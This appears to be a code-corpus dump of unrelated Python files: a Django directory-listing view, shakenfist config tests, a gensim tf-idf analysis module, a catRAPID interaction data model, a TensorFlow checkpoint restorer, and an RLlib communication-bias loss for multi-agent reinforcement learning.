if (self.config.app == APP_ALL):
common_url = reverse('index')
else:
common_url = reverse(self.config.app + ':list')
nav_item=Task.get_active_nav_item(self.request.user.id, self.config.app)
for key, value in views.items():
url = common_url
determinator = 'view'
view_id = self.config.main_view
if (view_id != key):
if ('role' in value):
determinator = 'role'
view_id = value['role']
url += view_id + '/'
else:
view_id = key
if (key != self.config.main_view):
if ('page_url' in value):
url += value['page_url'] + '/'
else:
url += '?view=' + key
if (self.config.app in FOLDER_NAV_APPS):
folder = ''
if ('folder' in self.request.GET):
folder = self.request.GET['folder']
if folder:
if ('?' in url):
url += '&'
else:
url += '?'
url += 'folder=' + folder
hide_qty = False
if ('hide_qty' in value):
hide_qty = value['hide_qty']
if hide_qty:
qty = None
else:
if (view_id == self.config.group_entity):
_nav_item = None
else:
_nav_item = nav_item
fix_group = detect_group(self.request.user, self.config.app, determinator, view_id, _(value['title']).capitalize())
qty = self.get_view_qty(fix_group, _nav_item)
active = (self.config.cur_view_group.determinator == determinator) and (self.config.cur_view_group.view_id == view_id)
fix = {
'determinator': determinator,
'id': view_id,
'url': url,
'icon': value['icon'],
'title': _(value['title']).capitalize(),
'qty': qty,
'active': active,
'search_qty': search_qty,
}
fixes.append(fix)
return fixes
def get_view_qty(self, group, nav_item):
data = self.get_dataset(group, nav_item=nav_item)
return len(data)
def get_dataset(self, group, query=None, nav_item=None):
if (group.determinator == 'role'):
cur_role = group.view_id
else:
cur_role = self.config.base_role
data = Task.get_role_tasks(self.request.user.id, self.config.app, cur_role, nav_item)
if (self.config.app == APP_ALL) and (not query):
return data
if data and ((not group.determinator) or (group.determinator == 'group')):
data = data.filter(groups__id=group.id)
# if (not group.completed):
# data = data.filter(completed=False)
if hasattr(self, 'tune_dataset'):
return self.tune_dataset(data, group)
return data
def get_nav_items(self):
nav_role = Task.get_nav_role(self.config.app)
if (not nav_role) or (nav_role == self.config.cur_view_group.view_id):
return None
href = self.request.path
if ('pk' in self.kwargs):
pk = str(self.kwargs['pk']) + '/'
if (pk in href):
href = href.split(pk)[0]
sort = 'name'
nav_item_group = detect_group(self.request.user, self.config.app, 'role', nav_role, '')
if nav_item_group and nav_item_group.items_sort:
sort = nav_item_group.items_sort
ret = []
for item in Task.get_role_tasks(self.request.user.id, self.config.app, nav_role).order_by(sort):
ret.append({
'id': item.id,
'name': item.name,
'qty': len(Task.get_role_tasks(self.request.user.id, self.config.app, self.config.cur_view_group.view_id, item)),
'href': href,
})
return ret
class DirContext(Context):
def get_context_data(self, **kwargs):
self.config.set_view(self.request)
self.object = None
self.cur_folder = ''
page_title = ''
title = ''
if ('folder' in self.request.GET):
self.cur_folder = self.request.GET['folder']
page_title = self.cur_folder.split('/')[-1:][0]
title = self.cur_folder
if not self.cur_folder:
page_title = _(self.config.app_title)
title = page_title
kwargs.update({'title': page_title})
dir_tree = []
self.scan_dir_tree(dir_tree, self.cur_folder, self.store_dir.rstrip('/'))
self.scan_files()
self.object = None
context = super().get_context_data(**kwargs)
upd_context = self.get_app_context(self.request.user.id, None, icon=self.config.view_icon, nav_items=None, **kwargs)
context.update(upd_context)
context['title'] = title
context['dir_tree'] = dir_tree
context['file_list'] = self.file_list
context['gps_data'] = self.gps_data
if (self.config.cur_view_group.determinator == 'view') and (self.config.cur_view_group.view_id != self.config.main_view):
context['cur_view'] = self.config.cur_view_group.view_id
context['theme_id'] = 24
context['cur_folder'] = self.cur_folder
return context
def scan_dir_tree(self, dir_tree, cur_folder, path, parent=None, demo=False):
ld = glob.glob(path + '/*/')
if not len(ld):
return
node = ''
level = 0
if parent:
node = parent['node']
if node:
node += '/'
node += parent['name']
level = parent['level'] + 1
s_node = node
if node:
s_node = node + '/'
p = path
for d in ld:
dd = d.replace('\\', '/')
name = dd.split(p)[1].strip('/')
x = {
'node': node,
'name': name,
'active': (cur_folder == s_node + name),
'level': level,
'qty': 0,
}
dir_tree.append(x)
if not demo:
self.scan_dir_tree(dir_tree, cur_folder, path + '/' + name, x)
def scan_files(self):
self.gps_data = []
self.file_list = []
with os.scandir(self.store_dir + self.cur_folder) as it:
for entry in it:
if (entry.name.upper() == 'Thumbs.db'.upper()):
continue
if entry.is_dir():
continue
ff = self.store_dir + self.cur_folder + '/' + entry.name
mt = mimetypes.guess_type(ff)
file_type = ''
if mt and mt[0]:
file_type = mt[0]
self.file_list.append({
'name': entry.name,
'href': 'file/?folder=' + self.cur_folder + '&file=' + entry.name,
'date': time.ctime(os.path.getmtime(ff)),
'type': file_type,
'size': self.sizeof_fmt(os.path.getsize(ff)),
})
return self.gps_data
def sizeof_fmt(self, num, suffix='B'):
for unit in ['', 'K', 'M', 'G', 'T', 'P', 'E', 'Z']:
if abs(num) < 1024.0:
return f'{num:3.1f}{unit}{suffix}'
num /= 1024.0
return f'{num:.1f}Yi{suffix}'
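# Illustrative examples (added for clarity):
# sizeof_fmt(500)  -> '500.0B'
# sizeof_fmt(2048) -> '2.0KB'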
| StarcoderdataPython |
3261873 | import mock
import testtools
from shakenfist import config
from shakenfist import exceptions
class ConfigTestCase(testtools.TestCase):
@mock.patch('socket.getfqdn', return_value='a.b.com')
@mock.patch('socket.gethostbyname', return_value='1.1.1.1')
def test_hostname(self, mock_hostname, mock_fqdn):
config.parsed.parse()
mock_fqdn.assert_called()
mock_hostname.assert_called()
self.assertEqual('a.b.com', config.parsed.get('NODE_NAME'))
self.assertEqual('1.1.1.1', config.parsed.get('NODE_IP'))
@mock.patch.dict('os.environ', {'SHAKENFIST_STORAGE_PATH': 'foo'})
def test_string_override(self):
config.parsed.parse()
self.assertTrue(isinstance(config.parsed.get('STORAGE_PATH'), str))
self.assertEqual('foo', config.parsed.get('STORAGE_PATH'))
@mock.patch.dict('os.environ', {'SHAKENFIST_CPU_OVERCOMMIT_RATIO': '1'})
def test_int_override(self):
config.parsed.parse()
self.assertTrue(isinstance(
config.parsed.get('CPU_OVERCOMMIT_RATIO'), int))
self.assertEqual(1, config.parsed.get('CPU_OVERCOMMIT_RATIO'))
@mock.patch.dict('os.environ', {'SHAKENFIST_RAM_SYSTEM_RESERVATION': '4.0'})
def test_float_override(self):
config.parsed.parse()
self.assertTrue(isinstance(config.parsed.get(
'RAM_SYSTEM_RESERVATION'), float))
self.assertEqual(4.0, config.parsed.get('RAM_SYSTEM_RESERVATION'))
@mock.patch.dict('os.environ', {'SHAKENFIST_RAM_SYSTEM_RESERVATION': 'banana'})
def test_bogus_override(self):
self.assertRaises(ValueError, config.parsed.parse)
@mock.patch.dict('shakenfist.config.CONFIG_DEFAULTS', {'FOO': [1, 2, 3]})
@mock.patch.dict('os.environ', {'SHAKENFIST_FOO': '[1, 4, 6]'})
def test_bogus_default(self):
self.assertRaises(exceptions.FlagException, config.parsed.parse)
| StarcoderdataPython |
3327797 | import gensim.downloader
import numpy as np
from gensim.corpora import Dictionary
from gensim.models import TfidfModel
from argparse import ArgumentParser
from logging import Logger
from pathlib import Path
from typing import List
from speechless.edit_context.common import TimelineChange
from speechless.processing.analysis.analysis import (ARG_PREPARE_METHOD_FN, AnalysisDomain,
AnalysisMethod, analysis_method_cli)
from speechless.processing.tokenization import (EditToken, make_timeline_changes,
sentence_segmentation, spacy_nlp)
from speechless.readers.subtitles import read_subtitles
from speechless.readers import read_entire_audio
from speechless.transcription import speech_to_text
from speechless.utils.logging import NULL_LOGGER
from speechless.utils.storage import make_cache_dir_rel
GENSIM_CACHE_DIR = make_cache_dir_rel('gensim')
CORPUS_DIR = str(GENSIM_CACHE_DIR / 'gensim-data/')
DICTIONARY_FILE = str(GENSIM_CACHE_DIR / 'tfidf_dictionary.dic')
MODEL_FILE = str(GENSIM_CACHE_DIR / 'tfidf_model.model')
class TfidfAnalysis(AnalysisMethod):
def __init__(self,
corpus: str,
sent_th_ratio: float,
remove_sw: bool,
lemmatize: bool,
logger: Logger = NULL_LOGGER) -> None:
super().__init__('Tf-idf Analysis', [AnalysisDomain.TEXT], logger)
self.sent_th_ratio = sent_th_ratio
self.remove_sw = remove_sw
self.lemmatize = lemmatize
gensim.downloader.BASE_DIR = CORPUS_DIR
gensim.downloader.base_dir = CORPUS_DIR
if Path(DICTIONARY_FILE).exists() and Path(MODEL_FILE).exists():
self.data_dict = Dictionary.load(DICTIONARY_FILE)
self.model = TfidfModel.load(MODEL_FILE)
else:
data = gensim.downloader.load(corpus)
self.data_dict = Dictionary(data)
self.data_dict.save(DICTIONARY_FILE)
corpus = [self.data_dict.doc2bow(line) for line in data]
self.model = TfidfModel(corpus)
self.model.save(MODEL_FILE)
def analyze(self, recording_path: str, subtitles_path: str) -> List[TimelineChange]:
if subtitles_path is None:
audio, _ = read_entire_audio(recording_path,
aud_format='s16le',
sample_rate=16000,
logger=self.logger)
transcript = speech_to_text(audio[0] if len(audio.shape) > 1 else audio)
else:
transcript = read_subtitles(subtitles_path)
sentences = sentence_segmentation(transcript)
tokens = self.set_labels(sentences)
return make_timeline_changes(tokens)
def set_labels(self, sentences: List[List[EditToken]]) -> List[EditToken]:
spacy_pipes = ['tagger', 'attribute_ruler'] + (['lemmatizer'] if self.lemmatize else [])
doc_text = ''.join([token.text for sentence in sentences for token in sentence])
doc_tokens = spacy_nlp(doc_text, spacy_pipes)
doc_tokens = [token for token in doc_tokens if not token.is_punct]
if self.remove_sw:
doc_tokens = [token for token in doc_tokens if not token.is_stop]
if self.lemmatize:
tfidf_doc = [token.lemma_ for token in doc_tokens]
else:
tfidf_doc = [token.norm_ for token in doc_tokens]
sent_scores = [[] for _ in range(len(sentences))]
if len(tfidf_doc) > 0:
bow = self.data_dict.doc2bow(tfidf_doc,)
doc_scores = self.model[bow]
doc_scores = {self.data_dict[key]: score for key, score in doc_scores}
sent_idx = -1
sent_start, sent_end = 0, 0
for token_idx, token in enumerate(doc_tokens):
while sent_idx + 1 < len(sentences) and not (sent_start <= token.idx < sent_end):
sent_idx += 1
first_sent_token = sentences[sent_idx][0]
last_sent_token = sentences[sent_idx][-1]
sent_start = first_sent_token.start_pos
sent_end = last_sent_token.start_pos + len(last_sent_token)
if sent_idx >= len(sentences):
break
sent_scores[sent_idx].append(doc_scores.get(tfidf_doc[token_idx], 0.0))
sent_scores = np.array([np.mean(s_sc) if len(s_sc) > 0 else 0 for s_sc in sent_scores])
sent_scores = (sent_scores >= self.sent_th_ratio * np.mean(sent_scores)).astype(float)
for sent_idx, sentence in enumerate(sentences):
for t in sentence:
t.label = sent_scores[sent_idx]
return [token for s in sentences for token in s]
def score_transcription(self, transcript: List[EditToken]) -> List[float]:
sentences = sentence_segmentation(transcript)
tokens = self.set_labels(sentences)
changes = [token.label for token in tokens]
return changes
############################################### CLI ################################################
@analysis_method_cli
class CLI:
COMMAND = 'tfidf'
DESCRIPTION = 'Tf-idf analysis'
ARG_CORPUS = 'corpus'
ARG_SENT_TH_RATIO = 'sent_th_ratio'
ARG_REMOVE_SW = 'remove_sw'
ARG_LEMMATIZE = 'lemmatize'
DEFAULT_ARGS = {
ARG_CORPUS: 'text8',
ARG_SENT_TH_RATIO: 1.0,
ARG_REMOVE_SW: False,
ARG_LEMMATIZE: False
}
@staticmethod
def prepare_method(args, logger: Logger) -> 'TfidfAnalysis':
return TfidfAnalysis(args.get(CLI.ARG_CORPUS, CLI.DEFAULT_ARGS[CLI.ARG_CORPUS]),
args.get(CLI.ARG_SENT_TH_RATIO, CLI.DEFAULT_ARGS[CLI.ARG_SENT_TH_RATIO]),
args.get(CLI.ARG_REMOVE_SW, CLI.DEFAULT_ARGS[CLI.ARG_REMOVE_SW]),
args.get(CLI.ARG_LEMMATIZE, CLI.DEFAULT_ARGS[CLI.ARG_LEMMATIZE]),
logger=logger)
@staticmethod
def setup_arg_parser(parser: ArgumentParser) -> ArgumentParser:
"""Sets up a CLI argument parser for this submodule
Returns:
ArgumentParser: Configured parser
"""
parser.add_argument('-c',
f'--{CLI.ARG_CORPUS}',
help='Corpus from gensim',
type=str,
action='store',
default=CLI.DEFAULT_ARGS[CLI.ARG_CORPUS])
parser.add_argument('-tr',
f'--{CLI.ARG_SENT_TH_RATIO}',
help='Sentence threshold ratio. Sentences with a score lower than \
`mean sentence score`*`ratio` will be removed from the recording',
type=float,
action='store',
default=CLI.DEFAULT_ARGS[CLI.ARG_SENT_TH_RATIO])
parser.add_argument('-rsw',
f'--{CLI.ARG_REMOVE_SW}',
help='Remove stopwords',
action='store_true',
default=CLI.DEFAULT_ARGS[CLI.ARG_REMOVE_SW])
parser.add_argument('-l',
f'--{CLI.ARG_LEMMATIZE}',
help='Use lemmatization',
action='store_true',
default=CLI.DEFAULT_ARGS[CLI.ARG_LEMMATIZE])
parser.set_defaults(**{ARG_PREPARE_METHOD_FN: CLI.prepare_method})
| StarcoderdataPython |
3379303 |
import re
from sqlalchemy import or_,and_
from sqlalchemy import Column, String, Integer, Boolean, Float, ForeignKey,PrimaryKeyConstraint
from sqlalchemy.orm import relationship
from fr.tagc.rainet.core.util.sql.Base import Base
from fr.tagc.rainet.core.util.sql.SQLManager import SQLManager
from fr.tagc.rainet.core.util.exception.RainetException import RainetException
from fr.tagc.rainet.core.util.log.Logger import Logger
from fr.tagc.rainet.core.data import DataConstants
from fr.tagc.rainet.core.util.pattern.PatternUtil import PatternUtil
from fr.tagc.rainet.core.util.sql.SQLUtil import SQLUtil
from fr.tagc.rainet.core.data.ProteinCrossReference import ProteinCrossReference
from fr.tagc.rainet.core.data.RNA import RNA
from fr.tagc.rainet.core.data.Protein import Protein
from fr.tagc.rainet.core.util.exception.NotRequiredInstantiationException import NotRequiredInstantiationException
from sqlalchemy.orm.base import instance_dict
from fr.tagc.rainet.core.util.time.Timer import Timer
import sys
# #
# This class describes a Protein-RNA interactions predicted by CatRAPID software.
#
class ProteinRNAInteractionCatRAPID( Base ):
__tablename__ = 'ProteinRNAInteractionCatRAPID'
# The RNA transcript ID, Ensembl ENST
transcriptID = Column( String, ForeignKey( 'RNA.transcriptID'), primary_key=True)
# The Protein Uniprot_ac ID
proteinID = Column( String, ForeignKey( 'Protein.uniprotAC'), primary_key=True)
# The interaction score / interaction propensity from catRAPID prediction
interactionScore = Column( Float )
proteins = relationship( "Protein" )
# #
# The ProteinRNAInteractionCatRAPID constructor.
#
# @param interactors: the interacting protein-RNA pair
# @param interaction_score: the interaction score
#
def __init__( self, interactors, interaction_score):
from fr.tagc.rainet.core.util.data.DataManager import DataManager
dt_manager = DataManager.get_instance()
#=======================================================================
# Parse interactors
#
# Example
# sp|Q96DC8|ECHD3_HUMAN ENST00000579524 -12.33 0.10 0.00
# sp|P10645|CMGA_HUMAN ENST00000516610 10.66 0.32 0.00
# protein and rna separated by " ", other values separated by "\t"
#
# Protein is always on left side, RNA in the right side.
# Assumption that there only one interaction between each Protein-RNA pair
#=======================================================================
spl = interactors.split(" ")
if len(spl) == 2:
protein_id = spl[0].split( "|")[1]
transcript_id = spl[1].split( "\t")[0]
else:
raise RainetException( "ProteinRNAInteractionCatRAPID.__init__ : The interactor string could not be parsed: " + str( interactors ))
#=======================================================================
# Fill variables
#=======================================================================
try:
self.interactionScore = float( interaction_score)
except ValueError as ve:
raise RainetException( "ProteinRNAInteractionCatRAPID.__init__ : The value of interaction score is not a float: " + str( interaction_score ), ve )
#=======================================================================
# Query Protein object
# See if Protein with given protein_id exists in database
#=======================================================================
protein_list = dt_manager.get_data( DataConstants.PROT_ALL_KW)
if protein_id in protein_list:
self.proteinID = protein_id
else:
# raise RainetException( "ProteinRNAInteractionCatRAPID.init : No Protein object while using cross references for protein_id = " + protein_id)
Logger.get_instance().warning( "\nProteinRNAInteractionCatRAPID.init : Protein ID not found, will skip interaction:\t" + str( protein_id) )
# Store missing Protein ID in a list
dt_manager.data[ DataConstants.PROTEIN_RNA_INTERACTION_CATRAPID_MISSING_PROT_KW].append( protein_id)
raise NotRequiredInstantiationException( "ProteinRNAInteractionCatRAPID.init : No Protein found, instance will not be created.")
#=======================================================================
# Query RNA object
# See if RNA with given transcript_id exists in database
#=======================================================================
RNA_list = dt_manager.get_data( DataConstants.RNA_ALL_KW)
if transcript_id in RNA_list:
self.transcriptID = transcript_id
else:
# raise RainetException( "ProteinRNAInteractionCatRAPID.init : No RNA object found for transcript_id = " + transcript_id)
Logger.get_instance().warning( "\nProteinRNAInteractionCatRAPID.init : RNA ID not found, will skip interaction:\t" + str( transcript_id) )
# Store missing RNA ID in a list
dt_manager.data[ DataConstants.PROTEIN_RNA_INTERACTION_CATRAPID_MISSING_RNA_KW].append( transcript_id)
raise NotRequiredInstantiationException( "ProteinRNAInteractionCatRAPID.init: No RNA found, instance will not be created." )
##
# Add the object to SQLAlchemy session if it is linked to a protein and RNA
def add_to_session(self):
sql_session = SQLManager.get_instance().get_session()
sql_session.add( self)
| StarcoderdataPython |
3358693 | import os
import tensorflow as tf
from tensorkit.log import logger, Color
class Restore(object):
def __init__(self):
self._var_list = None
self._restore_saver = None
self._restore_optimistic = False
self.restore_ckpt_file = None
self._inited = False
def init(self, var_list=None, ckpt_dir=None, ckpt_file=None, optimistic=False):
"""
:param var_list: variables to restore
:param ckpt_dir: directory containing the checkpoint files.
:param ckpt_file: exact path of the checkpoint file; takes priority over `ckpt_dir`.
:param optimistic: only restore variables whose names (and shapes) match the checkpoint.
:return:
"""
assert (var_list is None) or (len(var_list) > 0), 'invalid var_list: {}'.format(var_list)
assert ckpt_dir is not None or ckpt_file is not None, 'ckpt_dir and ckpt_file are both None'
self._var_list = var_list
self._restore_optimistic = optimistic
if ckpt_file is None:
assert os.path.exists(ckpt_dir), 'invalid checkpoint dir: %s' % ckpt_dir
# get ckpt file.
self.restore_ckpt_file = tf.train.latest_checkpoint(os.path.dirname(ckpt_dir + os.sep))
else:
self.restore_ckpt_file = ckpt_file
self._inited = True
return self
def restore(self, sess):
assert self._inited, 'make sure init() before restore()'
if self._restore_vars(sess):
logger.info('- succeed restore variables from: {}'.format(self.restore_ckpt_file))
return True
return False
def _restore_vars(self, sess):
"""
:param sess:
:return: boolean for successful or not
"""
if not self._restore_optimistic:
if self.restore_ckpt_file is None:
logger.warn(
Color.yellow('No checkpoint file for restore vars, checkpoint file is None', bold=True))
return False
self._restore_saver = tf.train.Saver(self._var_list, name='tk_restore')
self._restore_saver.restore(sess, self.restore_ckpt_file)
return True
else:
return self._optimistic_restore_model(sess)
def _optimistic_restore_model(self, sess):
"""
Restore only the weights whose names and shapes match variables in the current model.
:param sess:
:return:
"""
if self.restore_ckpt_file is None:
logger.warn(Color.yellow('No ckpt file for restore vars, ckpt file is None'))
return False
reader = tf.train.NewCheckpointReader(self.restore_ckpt_file)
saved_shapes = reader.get_variable_to_shape_map()
if self._var_list is None:
restore_key2vars = {var.name.split(':')[0]: var for var in tf.global_variables()}
elif isinstance(self._var_list, list):
restore_key2vars = {var.name.split(':')[0]: var for var in self._var_list}
elif isinstance(self._var_list, dict):
restore_key2vars = self._var_list
else:
raise RuntimeError('type error {}'.format(self._var_list))
assert len(restore_key2vars) > 0
restore_key2vars = sorted([(k, v) for k, v in restore_key2vars.items() if k in saved_shapes])
msg = []
var_list = dict()
with tf.variable_scope('', reuse=True):
for key, var in restore_key2vars:
var_shape = var.get_shape().as_list()
if var_shape == saved_shapes[key]:
var_list[key] = var
var_name = var.name[:var.name.index(':')]
msg.append('- restoring variable: {}'.format(var_name)
if var_name == key else
'- restoring variable {} from {}'.format(var_name, key))
else:
msg.append(Color.yellow(
'- variable({}) with inconsistent shape: {}(graph) != {}(ckpt)'.format(
key, var_shape, saved_shapes[key])
))
if len(var_list) != 0:
msg += ['- total variable count: {}'.format(len(var_list))]
logger.info('\n'.join(msg))
saver = tf.train.Saver(var_list, name='tk_restore')
saver.restore(sess, self.restore_ckpt_file)
return True
else:
logger.warn(Color.yellow('No vars need to restore from file: {}'.format(self.restore_ckpt_file)))
return False
def __str__(self):
content = 'RESTORE_OPTIMISTIC: %s' \
'\nRESTORE_CHECKPOINT_FILE: %s' % (self._restore_optimistic, self.restore_ckpt_file)
return content
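# Illustrative usage (added sketch; paths are hypothetical):
# restorer = Restore().init(ckpt_dir='./checkpoints', optimistic=True)
# with tf.Session() as sess:
#     sess.run(tf.global_variables_initializer())
#     if not restorer.restore(sess):
#         logger.warn('no weights restored, training from scratch')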
| StarcoderdataPython |
1724031 | """
Implementation of Eccles, Tom, et al. "Biases for Emergent Communication in Multi-agent
Reinforcement Learning." Advances in Neural Information Processing Systems. 2019.
"""
import gym
import numpy as np
from ray.rllib import SampleBatch
from ray.rllib.agents.impala import vtrace
from ray.rllib.agents.impala.vtrace_policy import _make_time_major, BEHAVIOUR_LOGITS
from ray.rllib.models import ModelCatalog
from ray.rllib.models.tf.tf_action_dist import MultiActionDistribution, Categorical
from ray.rllib.policy.policy import ACTION_LOGP
from ray.rllib.utils import try_import_tf
from ray.rllib.utils.tuple_actions import TupleActions
from .impala_cpc_sa import WASTED_ACTS, CpcVTracePolicy
from ..utils.model_utils import CPCLayer
tf = try_import_tf()
NO_MESSAGE_OBS = "no_message_obs"
class MessageActionDistribution(MultiActionDistribution):
"""Distribution for (action, message) tuple"""
def __init__(self, inputs, model, action_space, name):
child_dist = []
input_lens = []
for action in action_space.spaces:
dist, action_size = ModelCatalog.get_action_dist(action, {})
child_dist.append(dist)
input_lens.append(action_size)
super().__init__(inputs, model, action_space, child_dist, input_lens)
with tf.variable_scope(name):
self.entropy_list = [s.entropy() for s in self.child_distributions]
@staticmethod
def required_model_output_shape(action_space, model_config):
input_lens = []
for action in action_space.spaces:
dist, action_size = ModelCatalog.get_action_dist(action, {})
input_lens.append(action_size)
return sum(input_lens)
def entropy(self):
return self.entropy_list[0]
def message_entropy(self):
return self.entropy_list[-1]
def mean_message_entropy(self):
"""Entropy of the mean message policy"""
p_average = self.mean_message_p()
logp_average = tf.log(p_average)
return -tf.reduce_sum(p_average * logp_average)
def mean_message_p(self):
message_dist = self.child_distributions[-1]
message_logits = message_dist.inputs
p_bt = tf.nn.softmax(message_logits)
p_average = tf.reduce_mean(p_bt, axis=0)
return p_average
def action_p(self):
action_dist = self.child_distributions[0]
action_logits = action_dist.inputs
return tf.nn.softmax(action_logits)
def action_logits(self):
return self.child_distributions[0].inputs
class DeterministicMessageActionDistribution(MessageActionDistribution):
"""Distribution for (stochastic action, deterministic message) tuple"""
def sample(self):
return TupleActions(
[
self.child_distributions[0].sample(),
self.child_distributions[1].deterministic_sample(),
]
)
def logp(self, x):
split_indices = []
for dist in self.child_distributions:
if isinstance(dist, Categorical):
split_indices.append(1)
else:
split_indices.append(tf.shape(dist.sample())[1])
split_list = tf.split(x, split_indices, axis=1)
for i, distribution in enumerate(self.child_distributions):
# Remove extra categorical dimension
if isinstance(distribution, Categorical):
split_list[i] = tf.cast(tf.squeeze(split_list[i], axis=-1), tf.int32)
log_action = self.child_distributions[0].logp(split_list[0])
all_message_p = tf.nn.softmax(self.child_distributions[1].inputs)
indices = tf.stack([tf.range(tf.shape(all_message_p)[0]), split_list[1]], axis=1)
message_p = tf.gather_nd(all_message_p, indices)
return log_action + message_p
class CommBiasLoss:
def __init__(
self,
actions,
actions_logp,
actions_entropy,
message_entropy,
dones,
behaviour_action_logp,
behaviour_logits,
target_logits,
discount,
rewards,
values,
bootstrap_value,
dist_class,
model,
valid_mask,
config,
vf_loss_coeff=0.5,
entropy_coeff=0.01,
message_entropy_coeff=0.0,
clip_rho_threshold=1.0,
clip_pg_rho_threshold=1.0,
use_cpc=True,
cpc_ins=None,
cpc_preds=None,
cpc_coeff=10.0,
use_sender_bias=False,
l_ps_lambda=3.0,
entropy_target=1.0,
average_message_entropy=None,
sender_bias_coeff=0.1,
use_receiver_bias=False,
l_ce_coeff=0.001,
l_pl_coeff=0.01,
message_p=None,
no_message_p=None,
**kwargs,
):
"""
See VTraceLoss class
Args:
use_cpc: True if CPC loss should be added
cpc_ins: Input encodings of CPC (Shape: [T, B, code_size]
cpc_preds: Output encodings of CPC(Shape: [T, B, length, code_size]
cpc_coeff: Coefficient for CPC loss
use_sender_bias: True if sender bias loss should be added
l_ps_lambda:
"""
# Compute vtrace on the CPU for better perf.
with tf.device("/cpu:0"):
self.vtrace_returns = vtrace.multi_from_logits(
behaviour_action_log_probs=behaviour_action_logp,
behaviour_policy_logits=behaviour_logits,
target_policy_logits=target_logits,
actions=tf.unstack(actions, axis=2),
discounts=tf.to_float(~dones) * discount,
rewards=rewards,
values=values,
bootstrap_value=bootstrap_value,
dist_class=dist_class,
model=model,
clip_rho_threshold=tf.cast(clip_rho_threshold, tf.float32),
clip_pg_rho_threshold=tf.cast(clip_pg_rho_threshold, tf.float32),
)
self.value_targets = self.vtrace_returns.vs
# The policy gradients loss
self.pi_loss = -tf.reduce_sum(
tf.boolean_mask(actions_logp * self.vtrace_returns.pg_advantages, valid_mask)
)
# The baseline loss
delta = tf.boolean_mask(values - self.vtrace_returns.vs, valid_mask)
self.vf_loss = 0.5 * tf.reduce_sum(tf.square(delta))
# The entropy loss
self.entropy = tf.reduce_sum(tf.boolean_mask(actions_entropy, valid_mask))
self.message_entropy = tf.reduce_sum(tf.boolean_mask(message_entropy, valid_mask))
# The summed weighted loss
self.total_loss = (
self.pi_loss
+ self.vf_loss * vf_loss_coeff
- self.entropy * entropy_coeff
- self.message_entropy * message_entropy_coeff
)
if use_cpc:
# CPC loss
with tf.variable_scope("cpc_loss"):
losses = []
cpc_length = cpc_preds.shape.as_list()[2]
T = tf.shape(cpc_preds)[0]
# Scaling coeff to take mean over k
scaling_coeff = tf.cast(
tf.reverse(tf.minimum(tf.range(1, T - 1 + 1), cpc_length), axis=[0]),
dtype=tf.float32,
)
for k in range(1, cpc_length + 1):
loss = CPCLayer(k, name=f"cpc_{k}")([cpc_ins, cpc_preds[:, :, k - 1]])
losses.append(tf.reduce_sum(loss / scaling_coeff[: T - k]))
self.cpc_loss = tf.reduce_sum(tf.stack(losses), name=f"cpc_loss")
self.total_loss += self.cpc_loss * cpc_coeff
else:
self.cpc_loss = tf.constant(np.nan)
if use_sender_bias:
# Sender bias loss
with tf.variable_scope("sender_bias"):
self.average_message_entropy = average_message_entropy
self.sender_bias_loss = (
tf.reduce_sum(l_ps_lambda * (message_entropy - entropy_target) ** 2)
- average_message_entropy
)
self.total_loss += self.sender_bias_loss * sender_bias_coeff
else:
self.average_message_entropy = tf.constant(np.nan)
self.sender_bias_loss = tf.constant(np.nan)
if use_receiver_bias:
# Receiver bias loss
with tf.variable_scope("receiver_bias"):
self.l_ce = -tf.reduce_sum(
tf.stop_gradient(message_p) * tf.log(no_message_p)
)
self.l_pl = tf.reduce_sum(
tf.abs(message_p - tf.stop_gradient(no_message_p))
)
self.total_loss += self.l_ce * l_ce_coeff - self.l_pl * l_pl_coeff
else:
self.l_ce = tf.constant(np.nan)
self.l_pl = tf.constant(np.nan)
def build_ma_comm_loss(policy, model, dist_class, train_batch):
"""
Copied from build_vtrace_loss. Adds CPC loss, comm biases and/or modifications for
inference based messaging
"""
def make_time_major(*args, **kw):
return _make_time_major(policy, train_batch.get("seq_lens"), *args, **kw)
actions = train_batch[SampleBatch.ACTIONS]
dones = make_time_major(train_batch[SampleBatch.DONES], drop_last=False)
rewards = make_time_major(train_batch[SampleBatch.REWARDS], drop_last=False)
completed = tf.to_float(~dones)[-1]
next_train_batch = {
SampleBatch.CUR_OBS: make_time_major(train_batch[SampleBatch.NEXT_OBS])[-1],
SampleBatch.PREV_ACTIONS: make_time_major(train_batch[SampleBatch.ACTIONS])[-1],
SampleBatch.PREV_REWARDS: make_time_major(train_batch[SampleBatch.REWARDS])[-1],
"seq_lens": tf.ones_like(train_batch["seq_lens"]),
}
i = 0
while f"state_out_{i}" in train_batch:
next_train_batch[f"state_in_{i}"] = make_time_major(
train_batch[f"state_out_{i}"]
)[-1]
i += 1
next_model_out, _ = model.from_batch(next_train_batch)
next_values = model.value_function()
bootstrap_value = tf.multiply(next_values, completed, name="bootstrap_value")
model_out, _ = model.from_batch(train_batch)
action_dist = dist_class(model_out, model)
if isinstance(policy.action_space, gym.spaces.Discrete):
is_multidiscrete = False
output_hidden_shape = [policy.action_space.n]
elif isinstance(policy.action_space, gym.spaces.multi_discrete.MultiDiscrete):
is_multidiscrete = True
output_hidden_shape = policy.action_space.nvec.astype(np.int32)
else:
is_multidiscrete = False
output_hidden_shape = 1
behaviour_action_logp = make_time_major(train_batch[ACTION_LOGP], drop_last=False)
behaviour_logits = train_batch[BEHAVIOUR_LOGITS]
unpacked_behaviour_logits = tf.split(behaviour_logits, output_hidden_shape, axis=1)
unpacked_outputs = tf.split(model_out, output_hidden_shape, axis=1)
values = model.value_function()
if policy.is_recurrent():
max_seq_len = tf.reduce_max(train_batch["seq_lens"]) - 1
mask = tf.sequence_mask(train_batch["seq_lens"], max_seq_len)
mask = tf.reshape(mask, [-1])
else:
mask = tf.ones_like(rewards)
# Prepare actions for loss
loss_actions = actions if is_multidiscrete else tf.expand_dims(actions, axis=1)
custom_opts = policy.config["model"]["custom_options"]
use_cpc = custom_opts["use_cpc"]
if use_cpc:
cpc_ins = model.cpc_ins()
cpc_preds = model.cpc_preds()
cpc_config = custom_opts["cpc_opts"]
cpc_config.update(
dict(cpc_ins=make_time_major(cpc_ins), cpc_preds=make_time_major(cpc_preds))
)
else:
cpc_config = {}
use_sender_bias = custom_opts["use_sender_bias"]
if use_sender_bias:
size = tf.cast(tf.shape(actions)[0], tf.float32)
sender_bias_config = custom_opts["sender_bias_opts"]
sender_bias_config.update(
{"average_message_entropy": action_dist.mean_message_entropy() * size}
)
else:
sender_bias_config = {}
use_receiver_bias = custom_opts["use_receiver_bias"]
if use_receiver_bias:
no_message_model_out = model.no_message_out()
no_message_action_dist = dist_class(no_message_model_out, model)
receiver_bias_config = dict(
message_p=action_dist.action_p(),
no_message_p=no_message_action_dist.action_p(),
